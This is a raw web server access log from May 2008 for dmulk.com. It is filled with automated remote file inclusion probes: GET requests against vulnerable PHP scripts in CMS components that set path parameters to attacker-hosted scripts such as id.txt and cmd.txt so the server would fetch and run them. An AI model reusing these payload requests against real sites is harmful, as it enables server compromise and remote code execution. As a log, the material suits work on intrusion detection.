213.203.209.2 - - [03/May/2008:12:06:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [03/May/2008:12:06:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:12:06:48 -0700] "GET /display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:12:06:56 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:12:06:56 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:07:05 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:07:05 -0700] "GET //modules/TotalCalendar/about.php?site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:07:06 -0700] "GET /logs//modules/TotalCalendar/about.php?site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:07:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:07:39 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:07:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:07:54 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:12:08:07 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:12:08:08 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:12:08:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:08:15 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:12:08:39 -0700] "GET /logs/index.php?option=com_alphacontent§ion=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "dmulk.com"
207.58.131.61 - - [03/May/2008:12:08:40 -0700] "GET /logs/index.php?option=com_alphacontent§ion=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:08:41 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:08:41 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:08:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:12:08:44 -0700] "GET /index.php?option=com_alphacontent§ion=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11602 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "dmulk.com"
207.58.131.61 - - [03/May/2008:12:08:44 -0700] "GET /index.php?option=com_alphacontent§ion=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:12:09:07 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:12:09:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:12:09:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:09:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:09:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:12:09:49 -0700] "GET /send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:12:10:29 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:12:10:30 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:12:10:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.210.113.58 - - [03/May/2008:12:10:46 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.113.58 - - [03/May/2008:12:10:46 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:10:47 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:10:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:11:17 -0700] "GET /logs/access_080214.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:11:17 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:11:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:12:11:31 -0700] "GET /logs/send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:12:11:31 -0700] "GET /send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.7.103.13 - - [03/May/2008:12:12:46 -0700] "GET /logs/access_080218.log/index.php?option=com_user&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.30.249.131 - - [03/May/2008:12:12:47 -0700] "GET /index.php?option=com_user&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.65" "www.dmulk.com"
80.7.103.13 - - [03/May/2008:12:12:47 -0700] "GET /logs/index.php?option=com_user&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:12:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:12:56 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:12:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:13:01 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:13:04 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.225.178.34 - - [03/May/2008:12:13:29 -0700] "GET /blog/index.php/2008 HTTP/1.1" 200 10629 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "dmulk.com"
195.225.178.34 - - [03/May/2008:12:13:35 -0700] "GET /blog/index.php/2008/wp-admin/ HTTP/1.1" 200 11607 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "dmulk.com"
208.116.44.68 - - [03/May/2008:12:13:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:13:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:14:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:14:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:14:09 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:13 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:14:25 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.89 - - [03/May/2008:12:14:50 -0700] "GET /logs/access_070825.log HTTP/1.0" 200 82596 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.65.159.210 - - [03/May/2008:12:15:00 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:15:04 -0700] "GET /logs/homepage.php?sel=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:15:04 -0700] "GET /homepage.php?sel=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.149.248.210 - - [03/May/2008:12:15:19 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.149.248.210 - - [03/May/2008:12:15:20 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
82.149.248.210 - - [03/May/2008:12:15:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.149.248.210 - - [03/May/2008:12:15:27 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET //ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET //ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET /logs//ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:15:37 -0700] "GET /logs//ashnews.php?pathtoashnews=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:15:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:15:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:11 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:11 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:11 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:12 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:48 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:48 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:48 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:54 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:16:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:12:17:07 -0700] "GET /logs/content.php?seite=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:11 -0700] "GET /logs/access_080204.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:11 -0700] "GET /logs/access_080204.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:11 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:11 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:12:17:12 -0700] "GET /content.php?seite=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:17:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.187.156.7 - - [03/May/2008:12:17:12 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/c?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
85.187.156.7 - - [03/May/2008:12:17:12 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/c?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
85.187.156.7 - - [03/May/2008:12:17:13 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.187.156.7 - - [03/May/2008:12:17:13 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mmf.selcuk.edu.tr/mezunlar/chat/inc/smartyinit/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.233.12.225 - - [03/May/2008:12:17:44 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [03/May/2008:12:17:44 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [03/May/2008:12:17:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:12:18:19 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:12:18:19 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:12:18:19 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:18:22 -0700] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
